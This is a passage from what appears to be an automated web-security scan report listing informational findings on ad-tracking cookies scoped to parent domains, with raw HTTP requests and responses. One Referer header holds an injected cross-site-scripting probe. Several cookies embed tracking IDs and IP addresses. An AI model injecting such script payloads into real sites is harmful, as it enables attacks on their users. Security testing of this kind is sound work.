UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 12-Jun-2013 11:18:24 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1498390;type=mtvre912;cat=remot936;ord=4072029369417.578?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 13 Jun 2011 11:18:24 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 12-Jun-2013 11:18:24 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

12.56. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 12-Jun-2013 11:02:19 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035748&d.c=gif&d.o=nbag-n-league&d.x=80235257&d.t=page&d.u=http%3A%2F%2Fwww.nba.com%2Fmavericks%2Fplayoffs%2F2011_nba_finals_champions.html&d.r=http%3A%2F%2Fwww.nba.com%2Fmavericks%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nba.com/mavericks/playoffs/2011_nba_finals_champions.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 13 Jun 2011 11:02:19 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Wed, 12-Jun-2013 11:02:19 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

12.57. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=4a757a7-24.143.206.42-1305663172; expires=Wed, 12-Jun-2013 11:21:21 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p20101109&c3=11794&c4=15313&c5=1&c6=2&c7=mon%20jun%20%206%2011%3A54%3A51%202011&c8=http%3A%2F%2Fcas.ny.us.criteo.com%2Fdelivery%2Fafr.php%3Fzoneid%3D11794%26bannerid%3D15313%26did%3De2781b91d4%26rtb%3D6%26z%3DA806B85E716068DA%26b%3D_QvwWPOmF9qsK5gj17cW6Aw%25253d%25253d%26u%3D%7CnNCLaCHwmN07U4DRUZ0pHdqixMoMjXJxX2u8Zm%2FPtPU%3D%7C%26bi%3D%7CnNCLaCHwmN0J5w24FyGsdH%2B%2BTaD0GtSWalTZURlH6HtA06wdvExd4w%3D%3D%7C%26rl%3D~02-D56D73BBE04E7C6C5FBFD05DE07AB42148F56B7C-1-1-1-1----499220b078520fd232c6c82d63fe5ed76e555f74~%26ep%3D%257cnNCLaCHwmN35Kg6IthAYnOokjl6jAJDuWARTH7zdO09d4gvwAj4xCPeQctduIb%252fu%257c%26c%3DJgKZmjcgVQ2W2rfCWnzvGF49VVUAC02887GqDp9AuJ4fvT1Q-IkeHtZuTAgKG5GXWKbQcBCiB0nIjB-bwwvoITNGelXJ6ciB2QssfATJuE8&c9=Advertisement&c10=http%3A%2F%2Fsportdfw.com%2Faboutcontact-us%2F&c15=&1307963601527 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://cas.ny.us.criteo.com/delivery/afr.php?zoneid=11794&bannerid=15313&did=e2781b91d4&rtb=6&z=A806B85E716068DA&b=_QvwWPOmF9qsK5gj17cW6Aw%253d%253d&u=|nNCLaCHwmN07U4DRUZ0pHdqixMoMjXJxX2u8Zm/PtPU=|&bi=|nNCLaCHwmN0J5w24FyGsdH++TaD0GtSWalTZURlH6HtA06wdvExd4w==|&rl=~02-D56D73BBE04E7C6C5FBFD05DE07AB42148F56B7C-1-1-1-1----499220b078520fd232c6c82d63fe5ed76e555f74~&ep=%7cnNCLaCHwmN35Kg6IthAYnOokjl6jAJDuWARTH7zdO09d4gvwAj4xCPeQctduIb%2fu%7c&c=JgKZmjcgVQ2W2rfCWnzvGF49VVUAC02887GqDp9AuJ4fvT1Q-IkeHtZuTAgKG5GXWKbQcBCiB0nIjB-bwwvoITNGelXJ6ciB2QssfATJuE8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; UID=4a757a7-24.143.206.42-1305663172; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; BMX_G=method->-1,ts->1307963601; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 13 Jun 2011 11:21:21 GMT
Connection: close
Set-Cookie: UID=4a757a7-24.143.206.42-1305663172; expires=Wed, 12-Jun-2013 11:21:21 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

12.58. http://b.voicefive.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=4a757a7-24.143.206.42-1305663172; expires=Wed, 12-Jun-2013 11:21:21 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=4&c2=p20101109&c3=11794&c4=15313&c5=&c6=2&c7=Mon%20Jun%20%206%2011%3A54%3A51%202011&c8=&c9=&c10=&c15=&rn=1307963601 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://cas.ny.us.criteo.com/delivery/afr.php?zoneid=11794&bannerid=15313&did=e2781b91d4&rtb=6&z=A806B85E716068DA&b=_QvwWPOmF9qsK5gj17cW6Aw%253d%253d&u=|nNCLaCHwmN07U4DRUZ0pHdqixMoMjXJxX2u8Zm/PtPU=|&bi=|nNCLaCHwmN0J5w24FyGsdH++TaD0GtSWalTZURlH6HtA06wdvExd4w==|&rl=~02-D56D73BBE04E7C6C5FBFD05DE07AB42148F56B7C-1-1-1-1----499220b078520fd232c6c82d63fe5ed76e555f74~&ep=%7cnNCLaCHwmN35Kg6IthAYnOokjl6jAJDuWARTH7zdO09d4gvwAj4xCPeQctduIb%2fu%7c&c=JgKZmjcgVQ2W2rfCWnzvGF49VVUAC02887GqDp9AuJ4fvT1Q-IkeHtZuTAgKG5GXWKbQcBCiB0nIjB-bwwvoITNGelXJ6ciB2QssfATJuE8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; UID=4a757a7-24.143.206.42-1305663172; BMX_BR=pid=p20101109&prad=11794&arc=15313&exp=1307963601; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 13 Jun 2011 11:21:21 GMT
Connection: close
Set-Cookie: UID=4a757a7-24.143.206.42-1305663172; expires=Wed, 12-Jun-2013 11:21:21 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

12.59. http://bh.contextweb.com/bh/rtset previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Thu, 07-Jun-2012 11:02:20 GMT; Path=/
pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531399.1voofy6a0tk1w.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|531292.AG-00000001389358554.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|535461.4325897289836481830.0|536088.2814750682866683.0; Domain=.contextweb.com; Expires=Tue, 12-Jun-2012 11:02:20 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=535461&ev=4325897289836481830 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1%0A541%3B06%2F16%2F2011%3BLIFL1%0A749%3B06%2F11%2F2011%3BDOTM3%0A1914%3B07%2F02%2F2011%3BHWHS1; V=8vciuQJMXXJY; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531399.1voofy6a0tk1w.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|531292.AG-00000001389358554.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|536088.2814750682866683.0|535461.4325897289836481830.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web83
Cache-Control: no-cache, no-store
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Thu, 07-Jun-2012 11:02:20 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531399.1voofy6a0tk1w.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|531292.AG-00000001389358554.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|535461.4325897289836481830.0|536088.2814750682866683.0; Domain=.contextweb.com; Expires=Tue, 12-Jun-2012 11:02:20 GMT; Path=/
Content-Type: image/gif
Date: Mon, 13 Jun 2011 11:02:20 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

12.60. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

u2=a63925c0-e4e4-4878-9376-941d163fe5713Iy0c0; expires=Sun, 11-Sep-2011 07:41:27 GMT; domain=.serving-sys.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5134061~~0~~~^ebBelowTheFold~0~0~01020^ebAdDuration~899~0~01020&OptOut=0&ebRandom=0.47333265957422554&flv=10.3181&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.tvfanatic.com/favicon.ico7a1b0%22%3e%3cscript%3ealert(%22FAVICON%22)%3c/script%3e15dca0967be/
Origin: http://www.tvfanatic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=a63925c0-e4e4-4878-9376-941d163fe5713Iy0c0; expires=Sun, 11-Sep-2011 07:41:27 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.3181&RES=128&WMPV=0; expires=Sun, 11-Sep-2011 07:41:27 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 13 Jun 2011 11:41:26 GMT
Connection: close
Content-Length: 0

12.61. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A3=jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUO09sO00000kfL6aPj30aLz00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002kHgWaPj002WG00002jkpdaPj30c7w00001jAsGaPj002WG00001jNtfaUUK09sO00000kCKXaXnq08HG00002kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; expires=Sun, 11-Sep-2011 07:22:42 GMT; domain=.serving-sys.com; path=/
B3=8Vlw0000000001u+a9iq0000000001uQ8Whx0000000001uK9j0T0000000001u+afDX0000000002uK990p0000000002v59ZD90000000001uQ9fOC0000000002uK8nlR0000000001uK9cm20000000001uTalVe0000000001u+a0fG0000000001uZ8DfZ0000000001uKajUW0000000001u+89+70000000001uQahIj0000000001uK9XzA0000000001u+93LT0000000001uQ9i8d0000000001uKahI50000000001uK84hR0000000002uQ9xux0000000001uXa9it0000000001uQ9i8b0000000001uK9D2u0000000000u+9X5M0000000001uW8DfJ0000000001uK9iQ70000000002uQ9D2y0000000000u+9xuy0000000001uX7dOu0000000001uY9XJ40000000001uR9gvS0000000001uKa9j40000000001uK9v4a0000000001uK9gvT0000000001uK7dYp0000000001uK9qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+; expires=Sun, 11-Sep-2011 07:22:42 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2396185&PluID=0&w=728&h=90&ord=6915856&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b25/3/0/%2a/v%3B239493698%3B0-0%3B0%3B27141466%3B3454-728/90%3B41512802/41530589/1%3B%3B%7Eokv%3D%3Baid%3D15917%3Bsz%3D728x90%3Bpath%3D2011%3Bpath%3D06%3Bpath%3D13%3Bpath%3Dgame-of-thrones-watch-its-all-in-the-execution-2%3Bdcove%3Dd%3Bdcopt%3Dist%3Bpgurl%3D1%3Btile%3D1%3B%7Eaopt%3D2/1/57/0%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUP09sO00000kfL6aPj30aLz00001jkdoaPj00c7w00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002kHgWaPj002WG00002jkpdaPj30c7w00001jAsGaPj002WG00001jNtfaUUK09sO00000kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; B3=8Vlw0000000001u+a9iq0000000001uQ8Whx0000000001uK9j0T0000000001u+afDX0000000002uK9ZD90000000001uQ9fOC0000000002uK8nlR0000000001uK9cm20000000001uTalVe0000000001u+a0fG0000000001uZ8DfZ0000000001uKajUW0000000001u+89+70000000001uQahIj0000000001uK9XzA0000000001u+93LT0000000001uQ9i8d0000000001uKahI50000000001uK84hR0000000002uQ9xux0000000001uXa9it0000000001uQ9i8b0000000001uK9D2u0000000000u+9X5M0000000001uW8DfJ0000000001uK9iQ70000000002uQ9D2y0000000000u+9xuy0000000001uX7dOu0000000001uY9XJ40000000001uR9gvS0000000001uKa9j40000000001uK9v4a0000000001uK9gvT0000000001uK7dYp0000000001uK8VSD0000000001uD9qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUO09sO00000kfL6aPj30aLz00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002kHgWaPj002WG00002jkpdaPj30c7w00001jAsGaPj002WG00001jNtfaUUK09sO00000kCKXaXnq08HG00002kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; expires=Sun, 11-Sep-2011 07:22:42 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Vlw0000000001u+a9iq0000000001uQ8Whx0000000001uK9j0T0000000001u+afDX0000000002uK990p0000000002v59ZD90000000001uQ9fOC0000000002uK8nlR0000000001uK9cm20000000001uTalVe0000000001u+a0fG0000000001uZ8DfZ0000000001uKajUW0000000001u+89+70000000001uQahIj0000000001uK9XzA0000000001u+93LT0000000001uQ9i8d0000000001uKahI50000000001uK84hR0000000002uQ9xux0000000001uXa9it0000000001uQ9i8b0000000001uK9D2u0000000000u+9X5M0000000001uW8DfJ0000000001uK9iQ70000000002uQ9D2y0000000000u+9xuy0000000001uX7dOu0000000001uY9XJ40000000001uR9gvS0000000001uKa9j40000000001uK9v4a0000000001uK9gvT0000000001uK7dYp0000000001uK9qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+; expires=Sun, 11-Sep-2011 07:22:42 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 13 Jun 2011 11:22:42 GMT
Connection: close
Content-Length: 2111

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

12.62. http://ce.lijit.com/merge previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ce.lijit.com
Path:	/merge

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D; expires=Tue, 12-Jun-2012 11:02:21 GMT; path=/; domain=.lijit.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=1&3pid=4325897289836481830 HTTP/1.1
Host: ce.lijit.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_ts=t=1305981518646479; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D; ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; tpro_inst=ccc7e60c4d109f2ab6f71d3e2488034a; tpro=eJxNkNtuhSAQRf9lnskJF%2FH2G31sGkIQlUTBgDZpjP9eBmN73mZtZvbs4YQthtEtFvoTJusHG7FaNSr0JWsCo32oqi4Ceiq9QjGOGmUEWIamgMjQKlEhCE5ASFV1ZZSApGpbjoTE0ShqU5yMPgyKXZvNx6j0%2Bvjq5LTPQGB2aXvUsM8YkmYLM7tliNajjQ%2FY0EgCP%2FZeInOH8yasZQ1VgqKcHQRVdal5R6CmitFCAk%2Bhbyk7XBGWxd4n%2B%2BDvb5BvcsaGwBT1oJKZS8b2ynPJ7Rjj8ywV9PCxhbgnyFft0DNBm67mHa%2Bvr7%2BL8rfvDsP%2BvxJYw6BMODwOEfi2MbmQ7wX2onBdv4jRfBQ%3D; ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:21 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n28 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Tue, 14 Jun 2011 11:02:21 GMT
Content-Length: 43
Content-Type: image/gif
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D; expires=Tue, 12-Jun-2012 11:02:21 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;

12.63. http://cm.npc-lee.overture.com/js_1_0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.npc-lee.overture.com
Path:	/js_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UserData=02u3hs9yoaLQsFTjBpdHN1MjJzNHI0tDS0NnBUdk%2bLSi4sTU1JNbEBAGNDCwNHCydLI2cAAxJW/Qw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Thu, 10-Jun-2021 11:01:23 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

